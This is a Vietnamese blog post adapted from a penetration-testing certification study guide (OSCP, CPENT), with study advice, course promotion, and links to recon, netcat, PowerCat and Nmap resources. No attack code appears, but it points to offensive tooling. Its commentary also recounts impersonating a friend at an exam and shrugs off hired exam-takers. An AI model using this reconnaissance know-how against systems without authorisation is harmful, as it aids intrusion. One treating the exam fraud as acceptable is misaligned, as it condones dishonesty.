Hành trình Chuẩn bị cho kỳ thi CPENT, CEH Master, OSCP, eJPT, eCPPT
Lưu ý : Đây là bài viết tổng hợp từ blog của một số chuyên gia và có sự thêm bớt từ CEH VIETNAM. Các bạn xem và chọn lọc những phần nào mình quan tâm và ghi chú lại cho dễ học.
Lời giới thiệu Đây là bài viết của admin kên IT Security Labs, một kênh rất hay và có nét riêng với những video hướng dẫn thực hành Pentest có kèm phân tích qua Secure Onion. BQT chỉ thêm thắt cho nó phong phú và dễ đọc hơn, đôi chổ có phần ngẫu hứng có khi hay khi dở nhưng mục đích là mang đến cho các bạn một vector học tập khi ôn thi những chứng chỉ khó chơi (với những ai thực hành chưa tốt) còn những môn thật sự khó theo tôi nghĩ là các môn thiên về quản lý bảo mật, lý thuyết, nhàm chán và khó hiểu.
Như trên có nói, xem và Ghi Chú ! Vậy phần Ghi chú này cực kì quan trọng cho việc học tập và cả pentest hay thi cử sau này, mỗi người nên nắm vững một vài tool cơ sở ví dụ tôi hay dùng Notepad++ và Cherry Tree cộng với vẽ vời linh tinh như Mèo (scratch note) sau đó tôi hay chụp hình bản note của mình lưu cả trên Desktop vì nó đập vào mắt mình nhiều nhất. Năm nay năm Mèo mà, dùng từ này cho nó hên. Làm gì cũng có cái hên và may mắn thì sẽ suôn sẻ hơn, người tính không bằng thiên tính đâu các bạn.
Mục lục:
- Tổng quát
- Sự chuyên tâm
- Lời cảnh báo!
- Phần 1: Thông tin chung
- Phần 2: Làm quen với Kali Linux
- Phần 3: Dòng lệnh Linux Kung-Fu
- Phần 4: Các công cụ cần thiết trong Kali
- Phần 5: Bắt đầu với Bash Scripting
- Phần 6: Trinh sát thụ động
- Phần 7: Do thám tích cực
- Phần 8: Quét lỗ hổng bảo mật
- Phần 9: Các cuộc tấn công ứng dụng web
- Phần 10: Tràn bộ đệm cho Windows và Linux
- Phần 11: Các cuộc tấn công từ phía khách hàng
- Phần 12: Làm việc với Khai thác Công cộng
- Phần 13: Truyền tệp đến mục tiêu của bạn
- Phần 14: Vượt qua chống vi-rút
- Phần 15: Nâng cấp đặc quyền
- Phần 16: Bẻ khóa mật khẩu
- Phần 17: Chuyển hướng cổng và xoay vòng (pivot)
- Phần 18: Tấn công Active Directory
- Phần 19: Khung Metasploit
- Phần 20: PowerShell Emprie
- Tài nguyên bổ sung
- Thiết lập Môi trường Pentesting của bạn
- Wargames / Thử thách thực hành
- Nắm bắt các Cuộc thi Cờ (CTF) / Cuộc thi Trực tuyến
- Chương trình tiền thưởng lỗi
- Máy dễ bị tổn thương
- Các nguồn lực khác
- Phần kết luận
Tổng quát:
Sau khi phát hành phiên bản đầu tiên của hướng dẫn PWK / OSCP v 1, thì nay Offsec đã phát hành bản cập nhật cho PWK / OSCP và bao gồm một hệ thống phân loại chính để giúp sinh viên hiểu cách hoạt động của chỉ định khóa học. PWK / OSCP được phân loại là PEN-200 và đó là lý do ra đời của Tài liêu Hướng dẫn & Chuẩn bị cho PEN-200 mới. Các bạn có thể mua tài liệu PreOSCP của CEH VIETNAM để có sự chuẩn bị tốt, hiện nay OffSec chưa có chương trình Đối tác Ủy Quyền và các vấn đề liên quan họ quản lý rất chặt, ví dụ như video chia sẽ trên Youtube liên quan đến tài liệu là khả năng bị report rất cao (BQT bị rồi ) . Còn đối với chương trình CPENT do CEHVIETNAM đủ tiêu chuẩn đào tạo nên chúng tôi vừa cung cấp Voucher và cả Chương trình Huấn luyện riêng. Thậm chí Instructor của CEH VIETNAM là người VN duy nhất lọt Top 5 Pacific của EC Council. (có thông tin trên web của hãng)
Hướng dẫn này đã được chấp thuận cho PEN-200 được biên soạn bởi Tjnulls , BQT biên tập và thêm bớt cho dễ xem.
CEH CPENT LPT PENTEST+ SECURITY+ CYSA+ CASP + CEHMASTER EJPT
Lời NHẮC NHỞ !

- Dành nhiều thời gian nghiên cứu, tự mình giúp mình trước.
- Đừng mong đợi quản trị viên , hoặc thậm chí các học sinh khác dễ dàng cung cấp cho bạn câu trả lời; nỗ lực nghiên cứu các câu hỏi của bạn. Trù khi phải tham gia luyện tập theo các chương trình có phí cao và có trách nhiệm cao.
- Lên kế hoạch thực hiện cam kết về điều này và có tư duy cởi mở để học hỏi những điều mới. (khi các bạn có kế hoặc sẽ tự thấy “nhục hay áy náy nếu không làm được, có dám treo kế hoặc lên tường Face hay Zalo không ? Ví dụ tôi sẽ lấy CPENT trong tháng 3 hay 3 tháng, không lấy được là con DOG 🙂 . Để làm gương tôi sẽ treo trước nhé : Tôi Sẽ Lấy CPENT trong Tháng 3 , hoặc 3 tháng (cho nó nhẹ tí), không làm được thì làm lại. Mình có minh họa treo trên Tường nhé, ở đây !
- Mọi người chuẩn bị tinh thần và tâm lý khác nhau. Học cách xây dựng chiến lược / phương pháp luận của riêng bạn phù hợp với bạn khi bạn đang cải thiện các kỹ năng thực hành của mình. (BQT Nghe có vẽ phức tạp nhưng nói chung là các bạn có thời gian rảnh thì dành cho nó, còn lại lo kiếm tiền. Mình có một anh đệ mới pass CISSP và anh ấy nói là luyện trong thời gian ngồi xe buýt lên cơ quan, Anh này nhé, không nói điêu đâu. Như vậy, các bạn hãy sắp xếp thời gian thích hợp ví dụ thay vì xem Netflix hay đá bóng thì đọc tài liệu, xem video bài hoc và làm lab CPENT (món nào làm được trên xe buýt thì làm)
- Biết các công cụ của bạn! Có một số công cụ nhất định mà bạn không thể sử dụng cho kỳ thi. Tuy nhiên, điều đó không có nghĩa là bạn nên bỏ qua chúng. Hãy dành một chút thời gian để hiểu chúng vì bạn có thể phải sử dụng chúng khi tham gia thực tế hoặc trong lĩnh vực này. (BQT : Nhìn chung thi thố và làm việc nó có khác nhau nhiều, khi là thì cứ hàng nào hiệu quả ta xài, miễn là không vi phạm pháp luật. Điều này còn khó hơn trong bài thi, vì mấy ai biết hết những tool nào không được phép xài ngoài nước Mỹ, tôi cũng không rõ nhưng nêu các bạn làm cho khách hàng và lấy tiên của họ thì phải lo mà hiểu, chứ cứ dùng hàng trial hay home hay community rồi nó xuất cái report trong đó ghi hàng chùa, và khách họ thấy hàng chùa không được làm thương mại là mất thời gian lắm đấy. Vi vậy, nhơ làm cái Engagement hay hợp đồn cho chi tiết đầy đủ)
- Cẩn thận khi sử dụng Công cụ tự động: Các công cụ tự động có thể cải thiện hiệu suất của bạn và giảm thời gian thực hiện trong phương pháp luận của bạn khi đánh giá mục tiêu. Tuy nhiên, các công cụ tự động do các nhà phát triển này tạo ra có một số tính năng nhất định hoặc tạo các tập lệnh kết hợp các công cụ phổ biến để tự động hóa các phát hiện của họ. Những công cụ này có thể bỏ sót các dịch vụ hoặc phát hiện mà bạn nên tìm kiếm. Sẽ là tốt nhất nếu bạn dành thời gian để hiểu cách mọi thứ hoạt động theo cách thủ công. (BQT – Vừa auto vừa manual một cách hài hòa, quan trọng là hiểu những gì mình làm và tác động của nó lên mục tiêu hay cái Business của khách hàng, khách họ quan tâm đế việc kinh doanh chứ bảo mật hay pentest chẳng qua là để cho cái business nó ổn định, chứ họ quan tâm gì lắm đâu, nhớ là ưu tiên việc kiếm tiền của khách hàng, còn nếu luyện thi thì cứ tool lần manual mà làm cho nhuần nhuyễn, còn chưa nhuyễn thì rớt thi lại chẳng sao cả, lệ phí thi lại OSCP cung rẽ hơn cả Lab, CPENT thì đắt hơn nhưng nhìn chung có mấy bạn thi lại thấy vẫn vui, rớt bây giờ để sau này đỡ rớt những cái to lớn hơn.
- Hãy nhớ phương châm : Try Harder (BQT – Nhìn chung tôi chẳng thấy câu khẩu hiệu này có gì hay ho, tôi thích làm việc Thông Minh và thậm chí tùy hứng miễn là thích hợp, còn siêng năm chăm chỉ cũng tốt nhưng cứ linh động, việc nào cần cứ làm trước, chỉ các bạn mới rõ mình cần cái gì. Khối người tôi biết chẳng học hành gì cả, đi nhờ thi hộ . Không bàn đến vấn đề ethical, cũng chẳng rảnh đi mà đánh giá hay nhận xét cái đám này , vì chúng khá rắn và đanh đá như là ổ kiến lửa. Mà cũng phải thôi, thằng nào bị đụng vào nồi cơm chẳng thế, nên thôi thì việc mình mình làm và theo như lời một anh bạn lớn là chủ tịch tập đoàn Phương Trang có nói với tôi khi có dịp cà phê từ cách đây 20 năm là : Tụi mày nên đi đường chính, sẽ tiến xa leo cao. Còn mà đi đường tắt làm điều no ethical thì trước sau gì cũng gặp Quả (nếu các bạn thấy logo Lfuta với mấy cái gạch gạch là công sức thiết kế của tôi hơi nhiều đó, nhưng theo quy tắt Kinh Dịch đã được bỏ bớt một số gạch cho nó chuẩn). Tuy nhiên, khi nhờ người khác thi cũng có thể đó là cách smart đối vói họ vì họ có ưu tiên riêng, và họ vẫn có thể tự thi điểm còn cao hơn nhưng không có thời gian, trong khi khối đứa làm bài rất tốt lại đang khát lúa, hoặc nhiều đứa cho nhân viên làm bài dùng tóe loe lấy cả đống cert để đấu thầu. Ngày xưa vì nể bạn tôi cũng đi thi giúp môn Word và Excel với cách đè hình lên CMND, tuy nhiên anh ấy không biết là đã tin nhầm người, vì ngoài việc quý bạn ra thì tôi chẳng biết gì nhiều về Excel cả, đến nay cũng chỉ lỏm bỏm còn Word thì trình ngang soạn thảo văn bản, chắc là lần đó mình thi rớt quá 🙂. Nhìn chung mỗi người mỗi cách đi, quan trọng mục tiêu của các bạn là gì ? Nhưng bỏ công đọc bài này thì chắc là mục tiêu kiếm cert phải kèm kiến thức để kiếm lúa ! Chứ cần cái bằng xong tụi nhân sự nó vặn vài câu há hốc mồm thì đúng Nhục. Vậy tóm lại Try Harder But Smarter là OK !

hình minh hoạ, đừng căng 🙂
Và ! Hãy thử Try Harder với Try Hack Me , hãy làm tất cả lab của Try Hack Me nếu có thể (thằng Tnull nói nha các bạn) .
BQT – Vấn đề là làm lab nào ? Theo tôi các bạn hãy trả phí mua account VP của TryHackMe từ 3 – 6 tháng, làm theo 2 Learning Path Pentest + sau đó Offensive Security, tiếp theo 3 tháng lab HackTheBox rồi chưa yên tâm thì 1 tháng Pivot Ground (nếu chưa làm lab nhiều, nói chung cứ mua và lab đi, chẳng mất đi đâu cả, vì đầu tư vào bản thân thi lo gì nào :-). Không bao giờ lỗ ! Nếu các hệ thống đó họ có chương trình Academy gì đó thì mau luôn nếu có thể.
Thật vậy, các bạn phải bỏ tiền ra thì mới lo mà học chứ cái gì cũng FREE thì chẳng tốt đâu. Có bạn trong group bảo tôi cái khóa học ông làm cơ bản bỏ mẹ ra cho free còn được chứ tiền bạc gì ? (nói điêu tí chứ nó chẳng có mẹ con gì cả, và khá lịch sự xưng hô là admin đàng hoàng, phải nói thật là từ xưa đến nay tôi chưa thấy ai nói chuyện một cách chợ búa cả, các bạn đa số đều lịch lãm lịch sự, tôi cũng vậy, học theo mọi người cả) – Nhưng như một đại đai ca có nói : Đã giỏi cái gì thì đừng có làm miễn phí ! Còn nếu bạn làm xuất sắc hơn người cứ chém cho đắt vào, xứng đáng cả. Với lại, như tác giả Cha Giàu Cha Nghèo ông nói đừng học free, không có động lực, cho dù có nhiều thứ free vẫn rất tốt. Nói vậy chứ mình làm 2 khóa học PENTEST VỚI KALI LINUX & HACKING VỚI METASPLOIT trên UDEMY rất là chi phí thấp, còn cơ bản hay không cơ bản cứ từ từ sẽ thấy. Ai học còn được cho 1 cái account Office365 antoanthongtin.edu.vn, nói rõ là bonus nhé, không trách nhiệm gì cả, lỡ mà Microsoft họ xóa thì cũng chịu, nhưng họ luôn có thông báo để mình lưu data.
Và có group giao lưu support cho các bạn học hành tủ tế và đam mê vì thực chất Udemy thì khóa học của họ là vào xem video chủ yếu. Cho nên BQT support các bạn thì các bạn phải làm lab và record gởi lại cho BQT nhé. Khối ông giáo có cả trăm ngàn student trên đó mà bài update lần cuối là năm 2020 là biết rồi. Nhưng tôi thì sẽ update thường xuyên vì thứ nhất là mình rảnh và thứ hai là mình thích (cái này quan trọng hơn, chứ không thích thì đi lai rai chém gió với bạn bè cho nó vui chứ hơi đâu).
Các công cụ hạn chế :
- Các công cụ hoặc dịch vụ thương mại (Metasploit Pro, Burp Pro, v.v.)
- Các công cụ khai thác tự động. (ví dụ: db_autopwn, browser_autopwn, SQLmap, SQLninja, v.v.)
- Máy quét lỗ hổng bảo mật hàng loạt (ví dụ: Nessus, NeXpose, OpenVAS, Canvas, Core Impact, SAINT, v.v.)
- Các tính năng trong các công cụ khác sử dụng các giới hạn kỳ thi bị cấm hoặc hạn chế
- Bất kỳ công cụ nào thực hiện các chức năng tương tự như những công cụ trên cũng bị cấm. Bạn chịu trách nhiệm cuối cùng về việc biết các tính năng hoặc tiện ích bên ngoài mà bất kỳ công cụ nào đã chọn đang sử dụng. Mục tiêu chính của kỳ thi OSCP là đánh giá kỹ năng của bạn trong việc xác định và khai thác các lỗ hổng bảo mật, chứ không phải trong việc tự động hóa quy trình.
- Trường hợp sử dụng để hiểu các công cụ / tập lệnh bạn sử dụng trong Pentest
- Còn CPENT / LPT hay CEH MASTER chẳng thấy hạn chế gì cả, có gì chơi đó nhưng nằm vững mấy tool crackpassword trước, còn dò quét scanning với Nmap hay phân tích với Wireshark là kỹ năng thiết yếu rồi, không phải nói. Vì mấy cái này phải ổn thì các bạn mới thấy mục tiêu , và có khi phải bẻ khóa rồi mới có bài để làm tiếp…
Tham khảo: https://support.offensive-security.com/oscp-exam-guide/
Chỉ là một kì thi , cũng không qua tốn kém (còn ít tiền chán so với nhiều chứng nhận an ninh bảo mật khác, và có khi dễ hơn rất nhiều). Bạn có biết ai đã từng thi rớt 5 lần một môn nào đó không, tôi biết chắc chắn là có, một kì thi với những câu hỏi trắc nghiệm lý thuyết , tôi cho rằng hiếm có ai thi trượt OSCP qua 3 lần. CPENT thì có vài bạn thi lần 2, CEH MASTER thì chưa thấy ai rớt, CEH ANSI và CHFI ANSI cũng ít rớt , Security + thì khá nhiều, Pentest + có bạn rớt 3 lần chẳng qua học dốt quá, dốt ở đây không phải IQ kém mà chủ yếu muốn học gạo thi đểu (kiểu mở dump bên cạnh chỉ điểm cho thằng khác dốt hơn ngồi thi, có nhé, rớt 3 lần liên tiếp), còn nếu các bạn học đàng hoàng mà vẫn rớt thì đó là do học tài thi phận , té chổ nào đứng dậy chổ đó, không phải vì ta dốt. Ngày xưa đi học hầu như các môn thi buổi sáng hoặc trùng với một độ cờ tướng khốc liệt nào đó là rớt vì buổi sáng thì mình bỏ thi còn đánh cờ thì cũng quên thi. May mà hồi đó trường học họ ch retake khá thoải mái, chỉ cần đóng phí thi lại, chứ hiện nay là không ổn. Và tôi cũng khuyên các bạn hãy tránh vết xe của tôi để tránh thành Bác Sĩ CNTT (ý là học 4 hay 5 năm còn mình 6 hay 7 năm như bác sĩ vậy). Nhưng mà tôi cũng được vào danh sách sinh viên tiêu biểu được bằng khen này nọ do mang huy chương vàng cờ tướng về cho trường tại đại hội thể thao sinh viên toàn HCM lần 1 (ở nước ngoài có khi mình được miễn thi các môn khác luôn ấy nhĩ), thành tích khá là oách không thua trận nào nên được tặng cho cái hỗn danh là Tây Phương Bất Bại (trong cờ tướng hay có nick nae kiểu này nha các bạn, nếu như hàng dữ thì nick sẽ là tên của các nhân vật trong Kim Dung đó ví dụ như Kim Ma Sư Vương Mai Thanh Minh, Phong Trần Quái Khách Hoàng Đình Hồng, Tuyệt Duyệt Sư Thái Lê Thi Hương hay Đông Phương Bất Bại Trần Văn Ninh, còn nick Tây Phương của mình là hàng Phake thôi, phim hổng có 😦
Đề cương môn học
Tài nguyên quan trọng thứ hai mà tôi đã sử dụng để giúp tôi (Tnull) chuẩn bị cho khóa học: Kali Linux Reveal , CEH VIETNAM cũng có một khóa học dựa trên tài nguyên này nhằm bổ trợ cho khóa CEH MASTER và CPENT , PreOSCP , với giáo trình được biên soạn 1 – 1 từ tài liệu gốc. Dĩ nhiên là mua thì sẽ có, còn không đăng kí khóa học UDEMY PENTEST VỚI KALI LINUX và HACKING VỚI METASPLOIT sẽ được khuyến mãi sách xem online (nhớ là từ link trên nhé, chứ qua sàn thì hãng nó hốt hết 🙂
Từ giáo trình, chúng ta sẽ chia nhỏ từng phần bằng cách cung cấp cho bạn các tài nguyên mà tôi đã sử dụng để chuẩn bị cho khóa học. Sau khi xem xong giáo trình, tôi cũng sẽ cung cấp thêm một số tài nguyên hữu ích. Bạn không cần phải sử dụng hướng dẫn này theo thứ tự; có thể tự do để nhảy xung quanh khi nó phù hợp với bạn.
- Thông tin chung về khóa học
- Thoải mái với Kali Linux
- Dòng lệnh Linux Kung-Fu
- Các công cụ cần thiết trong Kali
- Bắt đầu với Bash Scripting
- Trinh sát thụ động
- Trinh sát tích cực
- Quét lỗ hổng bảo mật
- Các cuộc tấn công ứng dụng web
- Tràn bộ đệm Windows / Linux
- Các cuộc tấn công từ phía khách hàng
- Làm việc với Khai thác Công cộng
- Chuyển tập tin
- Bỏ qua chống vi-rút
- Nâng cấp đặc quyền
- Tấn công bằng mật khẩu
- Tunneling / Pivoting
- Các cuộc tấn công Active Directory
- Giới thiệu về Khung Metasploit
- Đế chế PowerShell
Phần 1: Thông tin chung về tài liệu học tập PREOSCP – CPENT
Lưu ý : CPENT thì các bạn có thể tham gia huấn luyện với CEH VIETNAM, còn OSCP thì mua tài liệu về tự xử.
Phần này cung cấp một cái nhìn tổng quan về những gì bạn sẽ mong đợi trong khóa học. Hướng dẫn PDF mà bạn sẽ nhận được cùng với tài liệu khóa học của mình chứa danh sách các tài nguyên và cách bạn nên tiếp cận tài liệu và môi trường phòng thí nghiệm. Tôi thực sự khuyên bạn nên đọc kỹ các giới hạn và nhận thức của OffSec về cách tạo báo cáo. Những phần đó thực sự sẽ giúp bạn hiểu cách bạn nên ghi chú, viết báo cáo, điều gì sẽ xảy ra khi bạn kiểm tra môi trường phòng thí nghiệm và cũng như những điều bạn nên cẩn thận khi thực hiện khóa học.
Khi nói đến việc viết báo cáo và ghi chép, bạn nên ghi lại MỌI THỨ mà bạn xác định được. Điều này bao gồm đầu ra từ các bản quét, ảnh chụp màn hình từ các phát hiện chính, các giả định của bạn và hơn thế nữa. Sắp xếp các ghi chú này sẽ có lợi về lâu dài khi viết báo cáo. Hãy nhớ rằng bạn luôn có thể chọn không đưa thông tin vào báo cáo nếu bạn không cần. Nhưng việc theo dõi lại các bước của bạn để lấy ảnh chụp màn hình, xuất công cụ, v.v. sẽ mất thời gian quý báu.
Hãy nhớ rằng mọi người đều ghi chú và xây dựng báo cáo của họ theo cách khác nhau. Việc xây dựng định dạng và bố cục của bạn là tùy thuộc vào bạn khi bạn đang tạo những ghi chú này phù hợp với quy trình làm việc của mình. Bạn sẽ phát triển và trau dồi điều này khi bạn trải qua các bài tập và phòng thí nghiệm. Đây là một bài học rất quan trọng.
Dưới đây là một số tài nguyên có thể cung cấp cho bạn ý tưởng về các công cụ ghi chú, những mẫu nào mọi người sử dụng để ghi chú và cách các công ty tạo báo cáo mới nhất của họ:
Công cụ báo cáo:
- Joplin: https://github.com/laurent22/joplin Trong Kali: apt cài đặt joplin
- CherryTree: https://github.com/giuspen/cherrytree
- Typora: https://typora.io/
- OneNote https://www.microsoft.com/en-us/microsoft-365/onenote/digital-note-KING-app
- Obsidian https://obsidian.md/
Lưu ý / Báo cáo các Mẫu Mới nhất:
- TJ Joplin Mẫu Pentest: https://github.com/tjnull/TJ-JPT
- Mẫu Pentest của Maik trong OneNote: https://maikthulhu.github.io/2017-11-20-onenote-layout
- Mẫu cây anh đào James Hall: https://411hall.github.io/assets/files/CTF_template.ctb
- Mẫu báo cáo OSCP của Whoisflynn: https://github.com/whoisflynn/OSCP-Exam-Report-Template
- CPENT hay LPT thì có sẵn mẫu của hàng khi làm xong thực hành
Công cụ chụp màn hình:
- Kazam (Trong Kali): https://launchpad.net/kazam
- Màn trập: https://shutter-project.org/
- Flameshot https://github.com/flameshot-org/flameshot
- Tôi hay dùng Bandicam Portable
Các công cụ để ghi lại đầu vào / đầu ra thiết bị đầu cuối của bạn:
Tập lệnh: Lệnh tập lệnh ghi lại một phiên trình bao (shell) để bạn có thể xem kết quả đầu ra mà bạn đã thấy tại thời điểm đó và thậm chí bạn có thể ghi lại với thời gian để bạn có thể phát lại trong thời gian thực.
- https://man7.org/linux/man-pages/man1/script.1.html
- Sử dụng Script để ghi lại mọi thứ trong thiết bị đầu cuối của bạn: https://ostechnix.com/record-everything-terminal/
Phần 2: Làm quen với Kali Linux
Khóa học trực tuyến và tiết lộ về Kali Linux: Một khóa học nền tảng tốt đã giúp tôi hiểu thêm về Kali Linux và nó có một phần Cơ bản về Linux rất hay (hoặc khóa học của BQT như trên).
- Liên kết sách: https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf
- Liên kết khóa học trực tuyến: https://kali.training/lessons/introduction/
- Tài liệu Kali Linux: https://www.kali.org/docs/
Đối với các vấn đề hỗ trợ và khắc phục sự cố:
- Diễn đàn hỗ trợ Kali Linux: https://forums.kali.org/
Các tài nguyên khác cho Kali Linux:
- Xây dựng Kali ISO của riêng bạn: https://www.kali.org/docs/development/dojo-mastering-live-build/
- Trường hợp sử dụng: https://www.offensive-security.com/kali-linux/creating-kali-i3-gaps/
Phần 3 Dòng lệnh Linux Kung-Fu:
Hành trình Linux: Một hướng dẫn khổng lồ để tìm hiểu về nhiều thứ khác nhau trong Linux. Tất cả các bài học là miễn phí.
EDX Giới thiệu về Linux:
Giải thích: Tài nguyên tuyệt vời phân tích cú pháp nhiều trang nam từ Kho lưu trữ Quản lý Ubuntu. Nó chia nhỏ các lệnh bạn đang sử dụng, nhưng tốt nhất là bạn nên tham khảo các trang hướng dẫn nếu bạn có bất kỳ câu hỏi nào:.

Thử thách để làm quen với Linux:
- Băng cướp (ý là Bandit, có phim tên này toàn bắn súng và đấm đá không có cảnh hack hiếc nào) Overthewire: https://overthewire.org/wargames/bandit/
- Cmdchallenge.com: https://cmdchallenge.com/
- HackerRank Linux Shell: https://www.hackerrank.com/domains/shell
Sách:
- Dòng lệnh Linux (Phiên bản thứ 2): https://nostarch.com/tlcl2
- Linux cho tin tặc: https://nostarch.com/linuxbasicsforhackers
- Lệnh Linux (Học về Shell): http://linuxcommand.org/lc3_learning_the_shell.php
Phần 4: Các công cụ cần thiết trong Kali (nhớ nắm vững)
Netcat: Công cụ TCP / IP Swiss Army. Hãy thử nghiệm với công cụ này và hiểu những gì nó hoạt động bởi vì bạn sẽ sử dụng nó hầu như hàng ngày trong suốt khóa học của bạn và hơn thế nữa.
- SANS Netcat Cheatsheet: https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
Ncat: Theo ý kiến của tôi, một phiên bản tốt hơn của netcat. Hỗ trợ giao tiếp SSL và nó là một phần của Nmap.
Socat: Một tiện ích dựa trên dòng lệnh thiết lập hai luồng byte hai chiều và truyền dữ liệu giữa chúng. Tuy nhiên, nó có khả năng cho phép nhiều máy khách cùng nghe trên một cổng và sử dụng lại các kết nối.
- Trang Socat Man: https://linux.die.net/man/1/socat
- PowerShell và PowerCat:
PowerShell là một ngôn ngữ kịch bản đa nền tảng do Microsoft xây dựng có thể được sử dụng để tự động hóa tác vụ và quản lý cấu hình. PowerShell bao gồm chạy trong môi trường shell hoặc dòng lệnh. Không giống như hầu hết các shell chấp nhận và trả về văn bản, PowerShell được xây dựng trên .NET Common Language Runtime (CLR) và chấp nhận và trả về các đối tượng .NET. PowerShell là một công cụ rất mạnh mẽ mà các pentesters sử dụng vì nó được cài đặt Mặc định trên Windows và nó cũng có thể được cài đặt trên các hệ thống Linux.
Tài nguyên để tìm hiểu thêm về PowerShell:
- Tài nguyên Học tập PowerShell: https://docs.microsoft.com/en-us/powershell/scripting/learn/more-powershell-learning?view=powershell-7
- PowerShell cho Pentesting trong Kali Linux: https://www.offensive-security.com/offsec/kali-linux-powershell-pentesting/
Sách:
- Windows PowerShell CookBook: https://www.amazon.com/Windows-PowerShell-Cookbook-Scripting-Microsofts/dp/1449320686
- Sách tham khảo Windows PowerShell: https://www.amazon.com/Windows-PowerShell-Pocket-Reference-Scripters-dp-1449320961/dp/1449320961/
- Tìm hiểu PowerShell trong một tháng ăn trưa: https://www.amazon.com/Learn-Windows-PowerShell-Month-Lunches/dp/1617294160/
Thực hành những thách thức để học PowerShell:
- underthewire.tech: https://underthewire.tech/wargames.htm
- codewars: https://www.codewars.com/
PowerCat: Một phiên bản powershell của netcat. Tập lệnh có thể được tải xuống mục tiêu Windows để chuyển tệp, trả về trình bao hoặc tạo tải trọng mà chúng ta có thể gọi lại từ mục tiêu của mình. https://github.com/besimorhino/powercat
TCPDump: Công cụ phân tích mạng cơ sở dòng lệnh. Rất hữu ích và tốt nếu bạn đang sử dụng hệ thống không có GUI. Đây là một bảng tốt mà tôi đã sử dụng cho tcpdump khi tôi cần khắc phục sự cố khai thác của mình: https://www.andreauckyna.org/technology/networking/tcpdump-a-simple-cheatsheet/
- Daniel Miessler Hướng dẫn TCPDump: https://danielmiessler.com/study/tcpdump/
Wireshark: Công cụ phân tích mạng dựa trên GUI. Có rất nhiều mẫu PCAP miễn phí trực tuyến mà bạn có thể sử dụng để hiểu cách hoạt động của Wireshark. Hãy cẩn thận với việc tải xuống một số tệp PCAP này vì chúng có thể có phần mềm độc hại trong đó; đảm bảo rằng bạn đã đọc PCAP đó từ đâu trước khi chơi: D
Mẫu PCAP:
- Netresec: https://www.netresec.com/?page=pcapfiles
- Phân tích lưu lượng phần mềm độc hại: https://www.malware-traffic-analysis.net/
- Packettotal (Giống như virustotal nhưng dành cho Phân tích PCAP): https://packettotal.com/
Phần 5: Bắt đầu với Bash Scripting
Hướng dẫn bash: Hướng dẫn hay để giúp bạn làm quen với kịch bản bash
Các tài nguyên để tìm hiểu thêm về Bash Scripting:
- Điểm hướng dẫn: https://www.tutorialspoint.com/unix/shell_scripting.htm
- CodeAcademy: https://www.codecademy.com/learn/bash-scripting/modules/bash-scripting
Mẫu ví dụ để viết Bash Scripts của riêng bạn:
- https://betterdev.blog/minimal-safe-bash-script-template/
- https://github.com/ralish/bash-script-template
Phần 6: Trinh sát thụ động
Hãy dành một chút thời gian để tìm hiểu về những thủ thuật và kỹ thuật này. Chúng chắc chắn sẽ có ích!
Google Dorks: Sử dụng các tìm kiếm google khác nhau mà bạn có thể tìm thấy có thể làm lộ thông tin nhạy cảm về mục tiêu.
- Cơ sở dữ liệu lấy cắp dữ liệu của Google: https://www.exploit-db.com/google-hacking-database
- SANS Google Dork Cheatsheet: https://www.sans.org/security-resources/GoogleCheatSheet.pdf
- Netcraft: https://netcraft.com/
Shodan: Shodan là một công cụ tìm kiếm cho phép người dùng tìm thấy các loại máy tính, thiết bị mạng, webcam, v.v. cụ thể được kết nối với internet bằng cách sử dụng một bộ lọc cho các kết quả đó.
- Shodan: https://www.shodan.io/
- Hướng dẫn Shodan: https://leanpub.com/shodan
- Shodan CLI: https://cli.shodan.io/
Xem lại Tiêu đề Bảo mật trên Trang web:
- Dự án Tiêu đề Bảo mật OWASP: https://owasp.org/www-project-secure-headers/
- Tìm Tiêu đề Bảo mật trên các trang web: https://securityheaders.com/
Thu hoạch Email:
- theharvester: https://github.com/laramies/theharvester
- Infoga: https://github.com/m4ll0k/Infoga
- Rec-ng: https://bitbucket.org/LaNMaSteR53/recon-ng/overview
Tài nguyên bổ sung: Các công cụ tôi không sử dụng trong phòng thí nghiệm nhưng tôi đã sử dụng chúng để chuẩn bị và chúng có ích cho các bài kiểm tra khác.
- Domaintools: http://whois.domaintools.com/
- Hộp công cụ MX: https://mxtoolbox.com/DNSLookup.aspx
Phần 7: Do thám tích cực
Giới thiệu về DNS: Nếu bạn không biết DNS là gì hoặc nó hoạt động như thế nào, đây là hướng dẫn tuyệt vời mà tôi đã sử dụng để hiểu rõ hơn về nó từ Digital Ocean: https://www.digitalocean.com/community/tutorials/an-introduction -to-dns-thuật ngữ-thành phần-và-khái niệm
Nếu bạn nghĩ rằng bạn đã hiểu rõ về DNS là gì thì bạn cũng sẽ cần phải hiểu cách thực hiện tra cứu ngược và xuôi. Ngoài ra, bạn cũng nên biết cách chuyển vùng hoạt động và cách thực hiện chúng. Thực hiện các bài kiểm tra này chắc chắn sẽ giúp bạn hiểu rõ hơn về mục tiêu của bạn trong phòng thí nghiệm. Để biết thêm thông tin về các kỹ thuật này, hãy xem bài viết này tại đây: https://resources.infosecinsinity.com/dns-enumeration-techniques-in-linux/
Các công cụ để liệt kê DNS:
- Dnsrecon được tạo bởi Darkoperator: https://github.com/darkoperator/dnsrecon
Quét mạng:
Nmap: Một công cụ mà bạn hoàn toàn nên học 100%. Bạn có thể sẽ sử dụng nó hàng ngày (Nếu không phải hầu hết thời gian khi bạn ở trong phòng thí nghiệm). Tôi thực sự khuyên bạn nên dành một chút thời gian để tìm hiểu công cụ này hoạt động như thế nào, cách hoạt động của từng công tắc lệnh, từng kỹ thuật quét mà bạn có thể chạy và bất kỳ khả năng nào khác. Nmap là một công cụ mạnh mẽ có khả năng xác định máy chủ nào đang trực tuyến, dịch vụ nào chúng đang chạy, hệ điều hành đang chạy trên máy chủ đó và hàng tá đặc điểm. Ngoài ra, một trong những tính năng mạnh mẽ nhất mà bạn cũng nên tìm hiểu là Nmap Scripting Engine (NSE). Với các tập lệnh NSE, bạn có khả năng tự động hóa nhiều tác vụ mạng để quét của bạn bao gồm phát hiện và khai thác lỗ hổng. Đây là tài nguyên của tôi mà tôi đã sử dụng để tìm hiểu thêm về Nmap:
